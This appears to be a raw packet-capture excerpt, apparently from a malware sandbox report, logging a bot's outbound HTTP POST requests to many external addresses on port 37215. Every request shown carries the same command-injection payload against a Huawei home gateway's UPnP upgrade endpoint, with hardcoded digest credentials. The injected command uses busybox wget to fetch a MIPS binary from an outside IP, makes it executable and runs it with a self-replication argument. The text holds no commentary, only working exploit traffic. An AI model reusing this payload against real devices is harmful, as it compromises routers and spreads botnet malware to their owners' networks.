                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          310192.168.2.2350262157.103.80.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177072048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          311192.168.2.2340540197.173.213.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177081108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          312192.168.2.2334260197.169.181.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177088022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          313192.168.2.2339922102.150.240.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177115917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          314192.168.2.2339334119.136.235.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177117109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          315192.168.2.2341156157.87.100.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177126884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          316192.168.2.2353236157.59.44.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177131891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          317192.168.2.2353996197.226.97.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177146912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          318192.168.2.233341093.76.77.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177165031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          319192.168.2.2350720157.186.130.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177175999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          320192.168.2.2350118157.231.21.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177180052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
